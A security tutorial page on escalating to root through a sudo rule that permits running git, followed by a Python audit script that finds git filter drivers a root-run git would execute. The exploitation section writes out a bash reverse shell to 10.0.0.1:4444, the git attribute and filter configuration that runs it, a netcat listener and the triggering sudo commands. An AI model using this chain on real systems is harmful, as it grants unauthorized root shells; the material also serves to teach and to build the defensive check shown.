Sudo Git Privilege Escalation
Last modified: 2023-03-12
A sudo rule that allows running git as root can be abused for privilege escalation.
Investigation
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"
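If we can commit to the git repository as root, we may be able to escalate privileges, because git executes commands configured in the repository (such as filter drivers) with the privileges of the user running it.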
Exploitation
1. Create a Payload
echo 'bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"' > /tmp/revshell
chmod +x /tmp/revshell
2. Set Git Config
# Go to the git repository
cd /opt/example
git init
echo '*.php filter=indent' > .git/info/attributes
git config filter.indent.clean /tmp/revshell
3. Commit the Repository
Before committing, we need to start a listener on the local machine.
nc -lvnp 4444
Then commit with sudo.
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example add -A
sudo /usr/bin/git --git-dir=/opt/example/.git --work-tree=/opt/example commit -m "commit"
Now we should get a shell in the local terminal.
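From the defender's side, the configuration above leaves two artifacts that can be checked before git is ever run as root on a repository: a filter driver command in .git/config and an attribute rule that routes files to it. The following is an added example, not part of the original page: a simplified audit whose function names (filter_drivers, audit, demo) are hypothetical, and which assumes the `[filter "name"]` section form, reads only .git/info/attributes and the top-level .gitattributes, and does not follow includes or global and system config.

```python
import re
import tempfile
from pathlib import Path

FILTER_SECTION = re.compile(r'^\s*\[\s*filter\s+"([^"]+)"\s*\]', re.I)
OTHER_SECTION = re.compile(r'^\s*\[')
COMMAND_KEY = re.compile(r'^\s*(clean|smudge|process)\s*=\s*(.*?)\s*$', re.I)
FILTER_ATTR = re.compile(r'(?:^|\s)filter=(\S+)')

def filter_drivers(config_text):
    """Map driver name -> {key: command} for every [filter "name"] section."""
    drivers, current = {}, None
    for line in config_text.splitlines():
        section = FILTER_SECTION.match(line)
        if section:
            current = section.group(1)
        elif OTHER_SECTION.match(line):
            current = None  # left the filter section
        elif current:
            kv = COMMAND_KEY.match(line)
            if kv:
                drivers.setdefault(current, {})[kv.group(1).lower()] = kv.group(2)
    return drivers

def audit(git_dir, work_tree):
    """Return (pattern, driver, key, command) for each attribute rule wired to a command."""
    git_dir, work_tree = Path(git_dir), Path(work_tree)
    config = git_dir / "config"
    drivers = filter_drivers(config.read_text()) if config.is_file() else {}
    findings = []
    for attr_file in (git_dir / "info" / "attributes", work_tree / ".gitattributes"):
        if not attr_file.is_file():
            continue
        for line in attr_file.read_text().splitlines():
            if line.lstrip().startswith("#"):
                continue
            for name in FILTER_ATTR.findall(line):
                for key, command in sorted(drivers.get(name, {}).items()):
                    findings.append((line.split()[0], name, key, command))
    return findings

def demo():
    """Constructed repository layout mirroring the configuration on this page."""
    root = Path(tempfile.mkdtemp())
    (root / ".git" / "info").mkdir(parents=True)
    (root / ".git" / "config").write_text('[filter "indent"]\n\tclean = /tmp/revshell\n')
    (root / ".git" / "info" / "attributes").write_text("*.php filter=indent\n")
    return audit(root / ".git", root)
```

Any finding on a repository named in a sudoers rule means an unprivileged user who can write to that repository's config controls a command that root's git will execute.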